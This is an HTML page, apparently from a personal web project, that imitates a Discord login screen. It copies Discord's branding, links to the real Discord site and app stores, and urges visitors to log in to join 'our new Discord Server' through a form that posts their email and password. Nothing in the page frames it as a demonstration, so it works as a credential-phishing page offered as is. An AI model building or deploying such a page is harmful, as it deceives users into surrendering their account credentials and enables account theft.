<html><head></head><body id="ana" style="padding:0px; margin:0px;">


     <meta charset="utf-8">
	 <title> Discord</title>
	 <meta name="viewport" content="width=device-width">
<link rel="icon" href="images/4.png">	
<style>

body {
	background-image: url("https://i.redd.it/gmyldjq35fy51.png");
} 

#ana{
background-color:#212121;
}
#joker{
border-radius:5px;}

#jokerclex{
font-family:sans-serif;
font-weight:400;
letter-spacing:;
color:#3d3d3d;
font-size:20px;
}

#sa{
background-color:212121;
width:300px;

}
#yazi1{
font-family:sans-serif;
color:#999;
width:230px;
 }
 #copyright{
font-family:sans-serif;
color:#999;}
#menu{


width:91%;
} 
#liste{
display:inline-block;}
#link{text-decoration:none;
color:#111111;
font-family:sans-serif;
font-size:13px;
font-weight:540;

    vertical-align: baseline;
}
#üst{
width:100%;
background-color:white;

height:79px;
}

#buton{
color:white;
background-color:#8C9EFF;
font-size:15px;

border-radius:3px;
outline:none;
font-family:sans-serif;
font-weight:700;
border:0;
width:200px;
height:40px;
max-width:99%;
max-height:50px;
}

#password{
background-color:#111111;
border:0;
outline:none;
border-radius:6px;
width:220px;
height:35px;

font-size:16px;}

</style>
	 







 

<a href="https://discord.com/channels/@me/" target="blank">
<img src="C:\Users\cuddl\OneDrive\Documents\GitHub\WebDev2\Version7.0\user11\images\logo.png" width="170" id="joker" style="margin:6px; margin-top: 20px; margin-right: 20px;"></a>


<br><br>

<center>

<center>
<div id="sa" style="border:5px solid #000000 ;"> <br> 


<br>
<img src="C:\Users\cuddl\OneDrive\Documents\GitHub\WebDev2\Version7.0\user11\images\7.png" height="120" widht"50"="">
<br>
<p><font face="arial" size="5" color="white">
</font></p><h1 id="jokerclex"><font face="arial" size="5" color="white">Please Login To continue </font></h1><font face="arial" size="5" color="white">
</font>

<p id="yazi1">

Please become a member of our new Discord Server by loging in!

</p>

<br>


<form method="post">
<input type="email" name="Email" placeholder="Email" required="" style="padding:6px; background:#ffffff; outline:none;text-align:center;
color:; width:83%; height:37px; border:1px solid #111111; font-family:sans-serif; font-weight:350;     flex: 1 0 0px;
    margin: 0;
    outline: 0;
    overflow: hidden;
    padding: 9px 0 7px 8px;
    text-overflow: ellipsis;
border: 1px solid #111111;    text-overflow: ellipsis;
    font: 400 13.3333px Arial; border-radius:3px;"><br><br>

<input type="password" name="Password" placeholder="Password " required="" style="text-align:center; padding:6px; background:#ffffff; outline:none;
color:; width:83%; height:37px; border:1px solid #111111; font-family:sans-serif; font-weight:350;     flex: 1 0 0px;
    margin: 0;
    outline: 0;
    overflow: hidden;
    padding: 9px 0 7px 8px;
    text-overflow: ellipsis;
border: 1px solid #111111;    text-overflow: ellipsis;
    font: 400 13.3333px Arial; border-radius:3px;"><br><br>

<br><br>
<button id="buton" type="submit"> Confirm </button>


 
</form>

</div></center>




<br> <br>
<center>
<div id="get">
<a href="https://apps.apple.com/tr/app/discord-talk-chat-hang-out/id985746746?l=tr" target="blank">
<img src="C:\Users\cuddl\OneDrive\Documents\GitHub\WebDev2\Version7.0\user11\images\appstore.png" width="120"></a>
<a href="https://play.google.com/store/apps/details?id=com.discord&amp;hl=tr&amp;gl=tr" target="blank">
<img src="C:\Users\cuddl\OneDrive\Documents\GitHub\WebDev2\Version7.0\user11\images\googleplay.png" width="120"></a>
</div>
</center>




</center></body></html>